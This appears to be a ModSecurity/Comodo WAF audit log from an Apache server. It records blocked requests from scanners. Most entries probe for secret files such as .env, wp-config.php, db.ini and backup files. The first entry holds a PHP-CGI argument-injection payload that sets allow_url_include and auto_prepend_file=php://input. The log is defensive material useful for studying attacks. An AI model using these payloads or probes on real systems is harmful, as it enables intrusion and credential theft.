Accept: */*
Content-Type: application/x-www-form-urlencoded
--058b232d-C--
--058b232d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--058b232d-E--
--058b232d-H--
Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745859471431128 3814 (- - -)
Stopwatch2: 1745859471431128 3814; combined=2492, p1=446, p2=2015, p3=0, p4=0, p5=30, sr=70, sw=1, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--058b232d-Z--
--24e7f335-A--
[29/Apr/2025:00:18:29 +0700] aA-4ZWj1i6BJZll4jGM7pAAAAIs 103.236.140.4 51056 103.236.140.4 8181
--24e7f335-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.86.64
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.86.64
X-Forwarded-Proto: https
Connection: close
User-Agent: Googlebot-Video/1.0
Accept-Charset: utf-8
--24e7f335-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--24e7f335-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745860709892541 821 (- - -)
Stopwatch2: 1745860709892541 821; combined=318, p1=262, p2=0, p3=0, p4=0, p5=55, sr=74, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--24e7f335-Z--
--75639e31-A--
[29/Apr/2025:00:18:50 +0700] aA-4emj1i6BJZll4jGM7sQAAAIo 103.236.140.4 51146 103.236.140.4 8181
--75639e31-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.86.64
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.86.64
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3803.0 Safari/537.36 Edg/76.0.174.0
Accept-Charset: utf-8
--75639e31-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--75639e31-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745860730046585 756 (- - -)
Stopwatch2: 1745860730046585 756; combined=299, p1=263, p2=0, p3=0, p4=0, p5=36, sr=71, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--75639e31-Z--
--d4b67a1e-A--
[29/Apr/2025:00:32:02 +0700] aA-7ko_5LpLtj_OTfS9rPAAAAME 103.236.140.4 54326 103.236.140.4 8181
--d4b67a1e-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.86.64
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.86.64
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; GT-P5210 Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Accept-Charset: utf-8
--d4b67a1e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d4b67a1e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745861522897924 817 (- - -)
Stopwatch2: 1745861522897924 817; combined=339, p1=304, p2=0, p3=0, p4=0, p5=35, sr=92, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d4b67a1e-Z--
--a5826563-A--
[29/Apr/2025:00:32:11 +0700] aA-7m8JruAEpaSEZ7DBYjgAAAAs 103.236.140.4 54360 103.236.140.4 8181
--a5826563-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.86.64
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.86.64
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14
Accept-Charset: utf-8
--a5826563-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a5826563-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745861531331609 758 (- - -)
Stopwatch2: 1745861531331609 758; combined=300, p1=263, p2=0, p3=0, p4=0, p5=37, sr=74, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a5826563-Z--
--43cc986c-A--
[29/Apr/2025:01:37:12 +0700] aA_K2Gj1i6BJZll4jGNSCwAAAIU 103.236.140.4 39778 103.236.140.4 8181
--43cc986c-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 194.163.159.240
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 194.163.159.240
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 9; GM1910) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36
Accept-Charset: utf-8
--43cc986c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--43cc986c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745865432239578 733 (- - -)
Stopwatch2: 1745865432239578 733; combined=296, p1=263, p2=0, p3=0, p4=0, p5=33, sr=74, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--43cc986c-Z--
--18dedc51-A--
[29/Apr/2025:01:37:30 +0700] aA_K6lT4soy9XydcuKY_pAAAAEw 103.236.140.4 40440 103.236.140.4 8181
--18dedc51-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 194.163.159.240
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 194.163.159.240
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Accept-Charset: utf-8
--18dedc51-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--18dedc51-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745865450682280 948 (- - -)
Stopwatch2: 1745865450682280 948; combined=440, p1=392, p2=0, p3=0, p4=0, p5=48, sr=119, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--18dedc51-Z--
--f8d20645-A--
[29/Apr/2025:01:46:39 +0700] aA_ND1T4soy9XydcuKZD7QAAAFY 103.236.140.4 59652 103.236.140.4 8181
--f8d20645-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.86.175
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.86.175
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/1.22 (compatible; MSIE 5.01; PalmOS 3.0) EudoraWeb 2.1
Accept-Charset: utf-8
--f8d20645-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f8d20645-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745865999133168 762 (- - -)
Stopwatch2: 1745865999133168 762; combined=335, p1=300, p2=0, p3=0, p4=0, p5=35, sr=74, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f8d20645-Z--
--67f14c1a-A--
[29/Apr/2025:03:41:52 +0700] aA_oEI_5LpLtj_OTfS-l8wAAAMI 103.236.140.4 41708 103.236.140.4 8181
--67f14c1a-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.71.106
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.71.106
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 9; SM-G973F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36
Accept-Charset: utf-8
--67f14c1a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--67f14c1a-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745872912730168 820 (- - -)
Stopwatch2: 1745872912730168 820; combined=368, p1=327, p2=0, p3=0, p4=0, p5=41, sr=74, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--67f14c1a-Z--
--0b076c6a-A--
[29/Apr/2025:03:49:41 +0700] aA_p5QW3ctMdWeqW3LOhJAAAAFA 103.236.140.4 47816 103.236.140.4 8181
--0b076c6a-B--
GET /.env HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 154.83.103.204
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 154.83.103.204
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--0b076c6a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--0b076c6a-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745873381523784 1299 (- - -)
Stopwatch2: 1745873381523784 1299; combined=568, p1=528, p2=0, p3=0, p4=0, p5=40, sr=139, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--0b076c6a-Z--
--f0ad395d-A--
[29/Apr/2025:03:49:41 +0700] aA_p5cDCAfZpkPvVAPOdBQAAAI0 103.236.140.4 47818 103.236.140.4 8181
--f0ad395d-B--
GET /config/.env HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 154.83.103.204
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 154.83.103.204
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--f0ad395d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f0ad395d-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745873381726131 876 (- - -)
Stopwatch2: 1745873381726131 876; combined=380, p1=343, p2=0, p3=0, p4=0, p5=36, sr=132, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f0ad395d-Z--
--3c3dff24-A--
[29/Apr/2025:03:49:41 +0700] aA_p5cDCAfZpkPvVAPOdBgAAAI4 103.236.140.4 47820 103.236.140.4 8181
--3c3dff24-B--
GET /.env.production HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 154.83.103.204
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 154.83.103.204
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--3c3dff24-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--3c3dff24-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745873381935543 673 (- - -)
Stopwatch2: 1745873381935543 673; combined=290, p1=259, p2=0, p3=0, p4=0, p5=31, sr=104, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--3c3dff24-Z--
--f764235b-A--
[29/Apr/2025:03:49:42 +0700] aA_p5sDCAfZpkPvVAPOdCAAAAJM 103.236.140.4 47826 103.236.140.4 8181
--f764235b-B--
GET /api/.env HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 154.83.103.204
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 154.83.103.204
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--f764235b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f764235b-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745873382137830 824 (- - -)
Stopwatch2: 1745873382137830 824; combined=355, p1=321, p2=0, p3=0, p4=0, p5=34, sr=123, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f764235b-Z--
--421af865-A--
[29/Apr/2025:03:49:42 +0700] aA_p5sDCAfZpkPvVAPOdCQAAAJA 103.236.140.4 47828 103.236.140.4 8181
--421af865-B--
GET /settings/.env HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 154.83.103.204
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 154.83.103.204
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--421af865-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--421af865-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745873382345477 681 (- - -)
Stopwatch2: 1745873382345477 681; combined=300, p1=269, p2=0, p3=0, p4=0, p5=31, sr=114, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--421af865-Z--
--39929a3e-A--
[29/Apr/2025:03:49:44 +0700] aA_p6MDCAfZpkPvVAPOdEQAAAII 103.236.140.4 47848 103.236.140.4 8181
--39929a3e-B--
GET /db.ini HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 154.83.103.204
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 154.83.103.204
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--39929a3e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--39929a3e-H--
Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||manage.bataranetwork.com|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745873384425530 2372 (- - -)
Stopwatch2: 1745873384425530 2372; combined=877, p1=395, p2=453, p3=0, p4=0, p5=29, sr=75, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--39929a3e-Z--
--50097b7c-A--
[29/Apr/2025:03:49:48 +0700] aA_p7MDCAfZpkPvVAPOdHQAAAJI 103.236.140.4 47884 103.236.140.4 8181
--50097b7c-B--
GET /docker/.env HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 154.83.103.204
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 154.83.103.204
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--50097b7c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--50097b7c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745873388242097 687 (- - -)
Stopwatch2: 1745873388242097 687; combined=281, p1=248, p2=0, p3=0, p4=0, p5=33, sr=85, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--50097b7c-Z--
--aaf5eb6a-A--
[29/Apr/2025:03:49:48 +0700] aA_p7AW3ctMdWeqW3LOhKAAAAFY 103.236.140.4 47890 103.236.140.4 8181
--aaf5eb6a-B--
GET /wp-config.php HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 154.83.103.204
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 154.83.103.204
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--aaf5eb6a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--aaf5eb6a-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745873388438059 1018 (- - -)
Stopwatch2: 1745873388438059 1018; combined=372, p1=334, p2=0, p3=0, p4=0, p5=38, sr=89, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--aaf5eb6a-Z--
--0cd65e63-A--
[29/Apr/2025:03:49:50 +0700] aA_p7gW3ctMdWeqW3LOhLQAAAEE 103.236.140.4 47902 103.236.140.4 8181
--0cd65e63-B--
GET /env.backup HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 154.83.103.204
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 154.83.103.204
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--0cd65e63-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--0cd65e63-H--
Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||manage.bataranetwork.com|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745873390450586 1777 (- - -)
Stopwatch2: 1745873390450586 1777; combined=692, p1=357, p2=309, p3=0, p4=0, p5=26, sr=112, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--0cd65e63-Z--
--cbab8828-A--
[29/Apr/2025:03:49:50 +0700] aA_p7gW3ctMdWeqW3LOhLwAAAEU 103.236.140.4 47908 103.236.140.4 8181
--cbab8828-B--
GET /settings.bak HTTP/1.0
Host: manage.bataranetwork.com
X-Real-IP: 154.83.103.204
X-Forwarded-Host: manage.bataranetwork.com
X-Forwarded-Server: manage.bataranetwork.com
X-Forwarded-For: 154.83.103.204
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--cbab8828-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--cbab8828-H--
Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||manage.bataranetwork.com|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745873390647723 2533 (- - -)
Stopwatch2: 1745873390647723 2533; combined=920, p1=481, p2=410, p3=0, p4=0, p5=29, sr=136, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--cbab8828-Z--
--bd1b9473-A--
